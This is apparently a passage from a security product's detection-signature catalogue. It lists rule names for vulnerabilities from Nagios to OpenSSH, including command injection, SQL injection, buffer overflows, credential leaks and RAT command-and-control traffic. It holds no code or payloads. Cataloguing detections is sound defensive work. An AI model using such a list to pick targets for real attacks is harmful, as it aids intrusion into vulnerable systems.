Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting
Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting
Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting
Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery
Nagios-Network-Analyzer-Report-Generator-Command-Injection
Nagios-Remote-Plugin-Executor-Arbitrary-Command-Execution
Nagios-Remote-Plugin-Executor-Command-Injection
Nagios-Statuswml-Cgi-Command-Injection
Nagios-XI--Windows-Winrm-Command-Injection
Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting
Nagios-XI-Account-Main-Stored-Cross-Site-Scripting
Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection
Nagios-XI-Alert-Cloud-Cross-Site-Scripting
Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931
Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40933
Nagios-XI-API-Key-Regeneration-Privilege-Escalation
Nagios-XI-Authenticated-Remote-Command-Execution
Nagios-XI-Autodiscovery-Arbitrary-Command-Execution
Nagios-XI-Autodiscovery-Job-Command-Injection
Nagios-XI-Autodiscovery-WebShell-Upload
Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection
Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection
Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite
Nagios-XI-Cmdsubsys-Command-Injection
Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection
Nagios-XI-Command_test.php-Command-Injection
Nagios-XI-Configwizards-Multiple-Command-Injections
Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection
Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload
Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal
Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal
Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting
Nagios-XI-favorites.inc.php-SQL-Injection
Nagios-XI-Helpedit.php-SQL-Injection
Nagios-XI-historytab_content.php-SQL-Injection
Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection
Nagios-XI-Magpie-Curl-Argument-Injection
Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting
Nagios-XI-Mibs.php-Command-Injection
Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection
Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting
Nagios-XI-Privilege-Escalation
Nagios-XI-Remote-Code-Execution
Nagios-XI-SNMP-Trap-SQL-Injection
Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection
Nagios-XI-Stored-Cross-Site-Scripting-CVE-2018-15712
Nagios-XI-Two-Reflected-Cross-Site-Scripting
Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting
Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting
Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection
Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting
Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection
Nagios-XI-Web-SSH-Terminal-Sshterm-Cross-Site-Scripting
NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting
Nakivo-Backup-And-Replication-Arbitrary-File-Read-CVE-2024-48248
NanoCore-RAT-C2-Traffic
Nanopool-Claymore-Dual-Miner-RCE
Nas4Free-Remote-Command-Execution
National-Instruments-Installer-Framework-ActiveX-Arbitrary-File-Creation
NaviCOPA-Web-Server-Buffer-Overflow
Navigate-CMS-Unauthenticated-Remote-Code-Execution
NBD-Network-Block-Device-Server-Long-Request-Buffer-Overflow
NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal
NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection
Necta-LLC-WiFi-Mouse-RCE
Need2Find-Toolbar
Neo4J-Shell-Server-setSessionVariable-Deserialization-CVE-2021-34371
Nerbian-RAT-C2-Traffic
Nessus-Vulnerability-Scanner-Usage
Net-SNMP-Handle_ipdefaultttl-Null-Pointer-Dereference
Net-SNMP-Handle_ipv6ipforwarding-Null-Pointer-Dereference
Net-SNMP-Write-Access-SNMP-EXTEND-MIB-Arbitrary-Code-Execution
NetAlertX-Unauthenticated-Arbitrary-File-Read
Netatalk-Dsi_opensession-Attention-Quantum-Out-Of-Bounds-Write
Netatalk-Dsi_writeinit-Heap-Buffer-Overflow-Vulnerability
NetBIOS-CS-Samba-Long-Password-BO
NetBIOS-LSASS-BOF
NetBIOS-NT4-RFPoison-DoS
NetBIOS-Remote-Registry-Request-DoS-MS00-040
NetBiter-webSCADA-Multiple-Vulnerabilities
Netcat-Stack-Buffer-Overflow
NetCode-Book-Cgi-System-Compromise
NetData-Streaming-Alert-Command-Injection
NetDecision-TFTP-Directory-Traversal-Execution
Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution
Netgain-Systems-Enterprise-Manager-Misc.sample_Jsp-Type-Directory-Traversal
Netgain-Systems-Enterprise-Manager-Rmi-Registry-Insecure-Deserialization
Netgain-Systems-Enterprise-Manager-Settings.upload-Filename-Directory-Traversal
Netgain-Systems-Enterprise-Manager-Snmpwalk-IP-Directory-Traversal
Netgain-Systems-Enterprise-Manager-Tftpserver-Filename-Directory-Traversal
Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting
Netgate-Pfsense-Command-Injection-CVE-2023-42326
Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325
Netgate-Pfsense-Diag_packet_capture.php-Command-Injection
Netgate-Pfsense-Diag_Routes-Command-Injection
Netgate-Pfsense-Firewall_alias.php-Stored-Cross-Site-Scripting
Netgate-Pfsense-Haproxy_listeners_Edit.php-Stored-Cross-Site-Scripting
Netgate-Pfsense-Pfblockerng-Host-Command-Injection
Netgate-Pfsense-Restore_rrddata-Command-Injection
Netgate-Pfsense-Services_wol_Edit.php-Stored-Cross-Site-Scripting
Netgate-Pfsense-Status-Command-Injection
Netgate-Pfsense-Stored-Cross-Site-Scripting-CVE-2024-46538
Netgate-Pfsense-System_Advanced_misc.php-Command-Injection
NetGear-Administrator-Password-Disclosure
NetGear-DGN1000-Remote-Command-Execution
NetGear-DGN2200-dnslookup.cgi-Command-Injection
NetGear-DGN2200-Remote-Command-Execution-CVE-2017-6077
NetGear-NMS300-Configfilecontroller-Addconfigfile-Arbitrary-File-Deletion
NetGear-NMS300-Configimagecontroller-Addconfigfile-Arbitrary-File-Deletion
NetGear-NMS300-Fileuploadutils-Directory-Traversal
NetGear-NMS300-Management-System-Arbitrary-File-Read-CVE-2016-1525
NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload
NetGear-Orbi-Router-Rbr750-Command-Execution-CVE-2022-37337
NetGear-Orbi-Satellite-RBS750-Command-Execution-CVE-2022-36429
NetGear-ProSafe-NMS300-Clearalertbyids-SQL-Injection
NetGear-ProSafe-NMS300-CVE-2023-38095-Arbitrary-File-Upload
NetGear-ProSafe-NMS300-CVE-2024-5247-Uploadservlet-Unrestricted-File-Upload
NetGear-ProSafe-NMS300-Getnodesbytopologymapsearch-SQL-Injection
NetGear-ProSafe-NMS300-Mibcontroller-Realname-Directory-Traversal
NetGear-ProSafe-NMS300-Myhandlerinterceptor-Authentication-Bypass
NetGear-ProSafe-NMS300-Reporttemplatecontroller-Arbitrary-File-Deletion
NetGear-ProSafe-NMS300-Savenodelabel-Stored-Cross-Site-Scripting
NetGear-ProSafe-NMS300-Settingconfigcontroller-Command-Injection
NetGear-ProSafe-NMS300-Uploadservlet-Directory-Traversal
NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
NetGear-ProSafe-Plus-Improper-Access-Control-CVE-2020-26919
NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset
NetGear-R7000-And-R6400-Cgi-Bin-Command-Injection
NetGear-RAX43-Command-Injection-CVE-2021-20167
NetGear-ReadyNAS-Perl-Code-Injection
NetGear-SSL312-Cgi-Binary-DoS
NetGear-Wireless-Access-Point-Remote-Code-Execution-CVE-2016-1555
NetGear-WNAP210-Remote-Password-Disclosure
NetGear-WNDAP350-Remote-Password-Disclosure
Netikus-EventSentry-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5077
NetIQ-Security-Solutions-For-Iseries-Safeshellexecute-Stack-Buffer-Overflow
Netis-Router-Backdoor
Netis-Router-MW5360-Unauthenticated-RCE
Netis-Router-Unauthenticated-Password-Change
Netis-WF2419-Remote-Code-Execution-CVE-2019-19356
Netlink-GPON-Router-Remote-Code-Execution
NetMechanica-NetDecision-HTTP-Server-Stack-Based-Buffer-Overflow
NetMotion-Mobility-Server-MvcUtil-Java-Deserialization
NetObserve-Authentication-Bypass
NetRisk-Remote-File-Inclusion
Netscape-Es-Dir-Disclosure
Netscape-Network-Security-Services-Library-Heap-Overflow
Netscape-NSS-Library-SSLv2-Record-Parsing-Buffer-Overflow
Netshagg
NetSupport-Manager-Client-Buffer-Overflow
NetSupport-RAT-Infection-Traffic
Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection
Netwin-Dmail-Etrn-BOF
Netwin-SurgeMail-IMAP-Lsub-Command-Buffer-Overflow
Netwin-SurgeMail-Webmail-Format-String
Netwin-SurgeMail-Webmail-Multiple-Header-Memory-Corruption
NetWire-RAT-Infection-Traffic
Network-Associates-PGP-Keyserver-Buffer-Overflow
Network-Time-Protocol-Daemon-Configure-Buffer-Overflow
Network-Time-Protocol-Daemon-Control_putdata-Buffer-Overflow
Network-Time-Protocol-Daemon-Crypto-nak-Authentication-Bypass
Network-Time-Protocol-Daemon-Crypto-nak-Denial-Of-Service
Network-Time-Protocol-Daemon-Decodenetnum-Assertion-Failure
Network-Time-Protocol-Daemon-Peer_xmit-Mode-Denial-Of-Service
Network-Time-Protocol-Daemon-Pidfile-Driftfile-Arbitrary-File-Overwrite
Network-Time-Protocol-Daemon-Read_Mru_List-Denial-Of-Service
Network-Time-Protocol-Ntpq-Decodearr-Stack-Based-Buffer-Overflow
New.Net-Toolbar
Newdotnet
Newsdesk-Cgi-File-Disclosure
NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
Next.js-Middleware-Security-Control-Bypass-CVE-2025-29927
Nexus-Repository-Manager-Java-EL-Injection
NFS-utils-TCP-Connection-Termination-Denial-Of-Service
Nginx-0-Length-Headers-Leak-Denial-Of-Service
Nginx-Chunked-Encoding-Buffer-Overflow
Nginx-Chunked-Transfer-Parsing-Denial-Of-Service
Nginx-DNS-Resolver-Denial-Of-Service
Nginx-DNS-Resolver-Off-By-One-Heap-Buffer-Overflow
Nginx-Location-NTFS-Extended-Attributes-Security-Bypass
Nginx-Remote-Source-Code-Disclosure
Nginx-Request-URI-Verification-Security-Bypass
Nginx-Unit-Router-Process-Heap-Based-Buffer-Overflow
Nginx-URI-Parsing-Buffer-Underflow
NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting
NgIRCd-Log-Resolver-Format-String-Vulnerability
Ngrbot
NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization
NightFury-Infection-Traffic
Nikto-Web-Vulnerability-Scanner
Nipper-Buffer-Overflow-CVE-2019-17424
NIPrint-Lpd-Lpr-Server-BOF
Nitol
Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow
Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow
Nitro-Pro-PDF-Nested-Pages-Use-After-Free
Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow
Nitro-Pro-PDF-Pattern-Object-Integer-Overflow
Nitro-Stealer-Infection-Traffic
NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow
NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service
NMAP-Web-Scanning-Activity
NNTP-Cassandra-Nntpserver-BOF
NNTP-Outlook-Express-List-Command-Response-Buffer-Overflow
NodCMS-Edit_Lang_File-PHP-Code-Execution
Node.js-Foundation-Node.js-TLS-Denial-Of-Service
Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service
Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling
Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315
NodeBB-Socket.io-Elevation-Of-Privilege
NodeBB-Socket.io-Eventname-Denial-Of-Service
Nodejs-JS-YAML-Load-Code-Execution
Non-Standard-Port-In-Iframe-Src-Attribute
nopCommerce-nopCommerce-BackupAction-Directory-Traversal
NorthStar-C2-XSS-To-Agent-RCE
Norton-AntiVirus-ActiveX-Denial-Of-Service
Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service
Norton-Internet-Security-2004-Symspam.dll-BOF
Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow
Norton-Internet-Security-Remote-Command-Execution
Nostromo-Directory-Traversal
Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow
Novell-Casa-PAM-Module-Stack-Buffer-Overflow
Novell-Client-NetIdentity-Agent-Pointer-Dereference-Code-Execution
Novell-Client-Printer-Spooler-Service-Request-Server-Name-Buffer-Overflow
Novell-Client-Printer-Spooler-Service-Server-Name-Buffer-Overflow
Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow
Novell-Distributed-Print-Services-Integer-Overflow
Novell-eDirectory-dhost-Buffer-Overflow
Novell-eDirectory-dhost-Httpstk-Buffer-Overflow
Novell-eDirectory-DOS-Device-Name-Denial-Of-Service
Novell-eDirectory-eMBox-Unauthenticated-File-Access
Novell-eDirectory-HTTP-Request-Content-Length-Heap-Buffer-Overflow
Novell-eDirectory-iMonitor-Cross-Site-Scripting
Novell-eDirectory-iMonitor-NDS-Server-Buffer-Overflow
Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow
Novell-eDirectory-NCP-Stack-Buffer-Overflow
Novell-eDirectory-NDS-Verb-0x01-Integer-Overflow
Novell-eDirectory-Server-Accept-Language-Buffer-Overflow
Novell-eDirectory-Server-iMonitor-Buffer-Overflow
Novell-eDirectory-Soap-Handling-Accept-Language-Header-Heap-Overflow
Novell-eDirectory-Unchecked-Length-Denial-Of-Service
Novell-File-Reporter-Agent-XML-Parsing-Stack-Buffer-Overflow
Novell-File-Reporter-Arbitrary-File-Delete
Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow
Novell-File-Reporter-Engine-Record-Tag-Parsing-Stack-Buffer-Overflow-2
Novell-File-Reporter-FSFUI-Arbitrary-File-Retrieval
Novell-File-Reporter-FSFUI-Record-Directory-Traversal
Novell-File-Reporter-SRS-Arbitrary-File-Retrieval
Novell-File-Reporter-Vol-Tag-Heap-Buffer-Overflow
Novell-File-Reporter-Vol-Tag-Stack-Buffer-Overflow
Novell-Groupwise-Addressbook-Heap-Buffer-Overflow
Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal
Novell-Groupwise-Agents-HTTP-Request-Remote-Code-Execution
Novell-Groupwise-Client-ActiveX-Gwabdlg.dll-Untrusted-Pointer-Dereference
Novell-Groupwise-Client-ActiveX-Gwmim1.ocx-Untrusted-Pointer-Dereference
Novell-Groupwise-Client-For-Windows-ActiveX-Code-Execution
Novell-Groupwise-Client-Img-Tag-Src-Parameter-Buffer-Overflow
Novell-Groupwise-HTTP-Interfaces-Arbitrary-File-Retrieval
Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing
Novell-Groupwise-Internet-Agent-Content-Type-Buffer-Overflow
Novell-Groupwise-Internet-Agent-Email-Address-Processing-BOF
Novell-Groupwise-Internet-Agent-HTTP-Interface-Stack-Buffer-Overflow
Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service
Novell-Groupwise-Internet-Agent-IMAP-Service-CREATE-Command-Buffer-Overflow
Novell-Groupwise-Internet-Agent-RCPT-Command-Buffer-Overflow
Novell-Groupwise-Internet-Agent-RRULE-Parsing-BOF
Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing-Buffer-Overflow
Novell-Groupwise-Internet-Agent-SMTP-Auth-Login-Command-Buffer-Overflow
Novell-Groupwise-Messenger-Client-Buffer-Overflow
Novell-Groupwise-Messenger-HTTP-Response-Handling-Stack-Overflow
Novell-Groupwise-Messenger-Nmma.exe-Createsearch-Memory-Corruption
Novell-Groupwise-Messenger-Nmma.exe-Login-Memory-Corruption
Novell-Groupwise-Messenger-Server-Process-Memory-Information-Disclosure
Novell-Groupwise-WebAccess-Cross-Site-Scripting
Novell-iManager-Class-Name-Remote-Buffer-Overflow
Novell-iManager-Create-Attribute-EnteredAttrName-Buffer-Overflow
Novell-iManager-eDirectory-Plugin-Schema-Buffer-Overflow
Novell-iManager-Getmultipartparameters-Unauthorized-File-Upload
Novell-iPrint-Client-ActiveX-Control-Buffer-Overflow
Novell-iPrint-Client-ActiveX-Control-GetPrinterURLLList-Buffer-Overflow
Novell-iPrint-Client-ActiveX-Control-Multiple-Buffer-Overflows
Novell-iPrint-Client-ActiveX-GetPrinterURLList2-Invalid-Free
Novell-iPrint-Client-Browser-Plugin-call-back-url-Buffer-Overflow
Novell-iPrint-Client-ExecuteRequest-debug-Parameter-Buffer-Overflow
Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow
Novell-iPrint-Client-GetDriverSettings-Realm-Parameter-Stack-Buffer-Overflow
Novell-iPrint-Client-GetDriverSettings-Stack-Buffer-Overflow
Novell-iPrint-Client-Remote-File-Deletion
Novell-iPrint-Client-Stack-Buffer-Overflow-CVE-2010-4321
Novell-iPrint-Client-Target-Frame-Stack-Buffer-Overflow
Novell-iPrint-Client-Volatile-Date-Time-Parsing-Buffer-Overflow
Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow
Novell-Messenger-Client-Filename-Parameter-Stack-Buffer-Overflow
Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass
Novell-NetMail-IMAP-Buffer-Overflow
Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow
Novell-NetWare-AFP-Remote-Denial-Of-Service
Novell-NetWare-CIFS.NLM-Buffer-Overflow
Novell-NetWare-FTP-Server-Dele-Command-Stack-Buffer-Overflow
Novell-NetWare-FTP-Server-Mkd-Buffer-Overflow
Novell-NetWare-NFS-Portmapper-RPC-Module-Stack-Overflow
Novell-NetWare-OpenSSH-Buffer-Overflow
Novell-NetWare-Xnfs.nlm-Caller-Name-Xdrdecodestring-Heap-Buffer-Overflow
Novell-NetWare-Xnfs.nlm-Stack-Buffer-Overflow
Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow
Novell-NetWare-Xnfs.nlm-Xdrdecodestring-Heap-Buffer-Overflow-2
Novell-Remote-Manager-Off-By-One-Denial-Of-Service
Novell-Sentinel-Log-Manager-Retention-Policy-Security-Restriction-Bypass
Novell-Service-Desk-Clientimportuploadform-Directory-Traversal
Novell-Teaming-Ajaxuploadimagefile-Remote-Code-Execution
Novell-ZENworks-Asset-Management-Directory-Traversal
Novell-ZENworks-Asset-Management-File-Upload-Directory-Traversal
Novell-ZENworks-Asset-Management-Web-Console-Information-Disclosure
Novell-ZENworks-Configuration-Management-Directory-Traversal
Novell-ZENworks-Configuration-Management-DirectoryViewer-Information-Disclosure
Novell-ZENworks-Configuration-Management-File-Upload
Novell-ZENworks-Configuration-Management-FileViewer-Information-Disclosure
Novell-ZENworks-Configuration-Management-Getstoredresult-SQL-Injection
Novell-ZENworks-Configuration-Management-Preboot-Directory-Traversal
Novell-ZENworks-Configuration-Management-Preboot-Policy-Service-Buffer-Overflow
Novell-ZENworks-Configuration-Management-Preboot-Service-Code-Execution
Novell-ZENworks-Configuration-Management-Rtrlet-Directory-Traversal
Novell-ZENworks-Configuration-Management-Schedule.schedulequery-SQL-Injection
Novell-ZENworks-Configuration-Management-Session-Id-Information-Disclosure
Novell-ZENworks-Configuration-Management-Umaninv-Information-Disclosure
Novell-ZENworks-Configuration-Management-Uploadservlet-Directory-Traversal
Novell-ZENworks-Configuration-Management-Uploadservlet-Remote-Code-Execution
Novell-ZENworks-Desktop-Management-On-Linux-Tftpd-Code-Execution
Novell-ZENworks-Handheld-Management-Buffer-Overflow
Novell-ZENworks-Handheld-Management-Upload-Directory-Traversal
Novell-ZENworks-Handheld-Management-Zfhipcnd.exe-Buffer-Overflow
Novell-ZENworks-Launchhelp.dll-ActiveX-LaunchProcess-Code-Execution
Novell-ZENworks-Mobile-Management-Cross-Site-Scripting
Novell-ZENworks-Mobile-Management-Dusap.php-Code-Execution
Novell-ZENworks-Mobile-Management-Mdm.php-Code-Execution
Novell-ZENworks-Patch-Management-Multiple-SQL-Injection-Vulnerabilities
Novell-ZENworks-Pre-Authentication-Buffer-Overflow
Novell-ZENworks-Preboot-Service-Opcode-4c-Buffer-Overflow
Novell-ZENworks-Preboot-Service-Opcode-6c-Buffer-Overflow
Novell-ZENworks-Remote-Management-Buffer-Overflow
NOVUS-NConfig-SEH-Buffer-Overflow
Now-SMS/MMS-Gateway-Buffer-Overflow
NSClient++-ExternalScripts-Authenticated-RCE
NSEC3-Invalid-Response-Heap-Corruption
NTLM-Credentials-Exposure
NTLM-Credentials-Leak-Via-Internet-Shortcut-CVE-2023-32046
NTLM-Hash-Disclosure-CVE-2024-43451
Ntopng-Authentication-Bypass-CVE-2021-28073
Ntp-Daemon-Autokey-Stack-Buffer-Overflow
Ntp-Daemon-Readvar-Stack-Buffer-Overflow
Ntp-Mode-7-Denial-Of-Service
Ntp-Monlist-Denial-Of-Service
Ntp.org-Network-Time-Protocol-Windows-Daemon-Getendptfromioctx-Denial-Of-Service
NTPsec-ntpd-Process-Control-Out-Of-Bounds-Read
NTPsec-ntpd-Write-Variables-DoS
NTR-ActiveX-Control-Check-Buffer-Overflow
NTR-ActiveX-StopModule-Code-Execution
Nucrypt
NuggetPhantom-Infection-Traffic
Nullsoft-Scriptable-Installation-System-Download-Plugin
Nullsoft-SHOUTcast-Server-Log-Cross-Site-Scripting
Nullsoft-Winamp-Advanced-Module-Format-File-Buffer-Overflow
Nullsoft-Winamp-AIFF-Parsing-Heap-Buffer-Overflow
Nullsoft-Winamp-AVI-Stream-Count-Integer-Overflow
Nullsoft-Winamp-Caf-File-Processing-Integer-Overflow
Nullsoft-Winamp-MIDI-File-Buffer-Overflow
Nullsoft-Winamp-MIDI-File-Header-Handling-Buffer-Overflow
Nullsoft-Winamp-MIDI-Timestamp-Stack-Buffer-Overflow
Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
Nullsoft-Winamp-Ultravox-Streaming-Metadata-Parsing-Stack-Buffer-Overflow
Nuuo-CMS-Arbitrary-File-Download
Nuuo-NVRmini-Upgrade_handle.php-Remote-Command-Execution
Nuxeo-Nuxeounknownresource-Expression-Language-Injection
Nymaim-Botnet
Object-Classid-In-Nonstandard-Format
ocPortal-Arbitrary-File-Inclusion
OCS-Inventory-NG-Commandline.php-Command-Injection
October-CMS-Remote-Code-Execution
October-CMS-Unauthorized-Password-Change-CVE-2021-32648
Octopus-C2-Infection-Traffic
Octoshape-P2P-Plugin-Usage
Office-BMP-Integer-Overflow-CVE-2009-2518
Office-Macro-Document
Office-XML-Macro-Document
Oficla-Malware
OLE-File-In-Text-File
OLE-Header-In-PDF-File
Oleaut32.dll-Remote-Code-Execution-Vulnerability
Ollama-Getblobspath-Digest-Directory-Traversal
OMI-Agent-Unauthenticated-RCE
Omron-Cx-One-Cx-flnet-Node-Name-Heap-Based-Buffer-Overflow
Omron-CX-One-Cx-flnet-Type-Heap-Based-Buffer-Overflow
Omron-Cx-One-Cx-flnet-Version-Heap-Based-Buffer-Overflow
Omron-Cx-One-Cx-Motion-Sscanf-Stack-Based-Buffer-Overflow
Omron-Cx-One-Cx-Motion-Wcscpy-Stack-Based-Buffer-Overflow
Omron-Cx-One-Cx-Position-Cdmapi32-Stack-Based-Buffer-Overflow
Omron-Cx-One-Cx-Position-Nci-File-Comment-Stack-Buffer-Overflow
Omron-Cx-One-Cx-programmer-Cdmapi32-Stack-Based-Buffer-Overflow
Omron-Cx-One-Cx-programmer-Program-Use-After-Free
Omron-Cx-One-Cx-Protocol-Cmessage-Type-Confusion
Omron-Cx-One-Cx-Protocol-Cscu-Type-Confusion
Omron-Cx-One-Cx-Protocol-Trace-Type-Confusion
Omron-Cx-One-flnet-Cdmapi32-Wcscpy-CVE-2022-21137-Stack-Buffer-Overflow
Omron-Cx-One-flnet-Cdmapi32-Wcscpy-Stack-Based-Buffer-Overflow
Omron-Cx-One-Sba-File-Parsing-Wcscpy-Stack-Based-Buffer-Overflow
OneDev-Platform-Attachmentuploadservet-Insecure-Deserialization
OneDev-Platform-Pre-Auth-Access-Token-Leak-CVE-2021-21246
OP5-license.php-Remote-Command-Execution
OP5-Monitor-Command-Test-Command-Injection
OP5-Welcome-Remote-Command-Execution
OPC-Systems-Denial-of-Service
Open-Falcon-Plus-Gethostsfromgroup-SQL-Injection
Open-Flash-Chart-Remote-PHP-Code-Execution
Open-Web-Analytics-Remote-Code-Execution
OpenAFS-Getstatistics64-RPC-Buffer-Overflow
OpenBSD-ISAKMP-Multiple-Vulnerabilities
OpenBSD-Kernel-ICMPv6-Handling-Buffer-Overflow
OpenBSD-TCP-Timeout-Calculation-Denial-Of-Service
Opencart-Archive-Extraction-Directory-Traversal
OpenCATS-Questionnaire-Doactions-Stored-Cross-Site-Scripting
OpenDocMan-Cross-Site-Scripting-CVE-2015-5625
Openemr-Admin-Edit_Globals-Application-Title-Stored-XSS
Openemr-Ajax_Download.php-Directory-Traversal
Openemr-Backup.php-Command-Injection
Openemr-Calendar-Search-SQL-Injection
Openemr-C_document.class.php-Foreign_Id-Cross-Site-Scripting
Openemr-C_document.class.php-Patient_Id-Cross-Site-Scripting
Openemr-C_document.class.php-View_Action-Doc_Id-Cross-Site-Scripting
Openemr-C_documentcategory.class.php-Stored-Cross-Site-Scripting
Openemr-Download_Template-Directory-Traversal
Openemr-Download_template.php-Directory-Traversal
Openemr-Facility_admin.php-Cross-Site-Scripting
Openemr-Fee_Sheet_Options_Ajax-Reflected-Cross-Site-Scripting
Openemr-Globals.php-Authentication-Bypass
Openemr-Make_Task-SQL_Injection
Openemr-New.php-Command-Injection
Openemr-New_comprehensive_save.php-Stored-Cross-Site-Scripting
Openemr-Patient_Report-Stored-Cross-Site-Scripting
Openemr-Phpgacl-Edit_group.php-SQL-Injection
Openemr-Rules-Controller.php-Fld_Title-Stored-Cross-Site-Scripting
Openemr-Share_Template-List_Id-Reflected-Cross-Site-Scripting
Openemr-Usergroup_Admin-Stored-Cross-Site-Scripting
OpenFire-Path-Traversal-Via-Setup-Environment-CVE-2023-32315
OpenJPEG-Jpeg2000-Image-Processing-Out-Of-Bounds-Write
OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability
OpenLDAP-BER_get_next-Denial-Of-Service
OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS
OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service
OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution
OpenLDAP-Modrdn-Request-Null-Pointer-Dereference
OpenLDAP-Nested-Filter-Stack-Overflow
OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service
OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference
OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure
OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure
OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure
OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow
OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow
OpenMediaVault-Cron-Remote-Command-Execution
Openmetadata-Authentication-Bypass-CVE-2024-28255
Openmetadata-Spel-Injection-CVE-2024-28253
Openmetadata-Spel-Injection-CVE-2024-28254
Openmetadata-Spel-Injection-CVE-2024-28847
Openmetadata-Spel-Injection-CVE-2024-28848
Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting
Openmrs-Webservices.rest-Insecure-Object-Deserialization
OpenNetAdmin-Ping-Command-Injection
OpenNMS-Privilege-Escalation-CVE-2023-0872
OpenNMS-Privilege-Escalation-CVE-2023-40315
OpenNMS-Rmi-Java-Object-Deserialization
OpenNMS-XML-External-Entity-Injection
OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
OpenOffice-EMF-File-EMR_BITBLT-Record-Integer-Overflow
OpenOffice-OLE-File-Stream-Buffer-Overflow
OpenOffice-TIFF-File-Parsing-Integer-Overflow
OpenOffice.org-Microsoft-Word-File-Processing-Integer-Underflow
OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
OpenOffice.org-XPM-File-Processing-Integer-Overflow
OpenProject-Cross-Site-Scripting-CVE-2019-17092
OpenSIS-Modname-Code-Execution
OpenSIS-Unauthenticated-PHP-Code-Execution
OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow
OpenSMTPD-Mta_io-Out-Of-Bounds-Read-Command-Execution
OpenSMTPD_Command-Injection_CVE-2020-7247
OpenSSH-Backdoor-C2-Traffic
OpenSSH-Challenge-Response-Integer-Overflow
OpenSSH-Kex_Input_Kexinit-Denial-Of-Service
OpenSSH-Man-In-The-Middle-Via-VerifyHostKeyDNS-CVE-2025-26465
OpenSSH-Pre-Authentication-Denial-Of-Service-CVE-2025-26466
OpenSSH-Sftp-Server.c-Denial-Of-Service
OpenSSH-Sshd-SSH_old_dhgex-Handling-Double-Free-Vulnerability
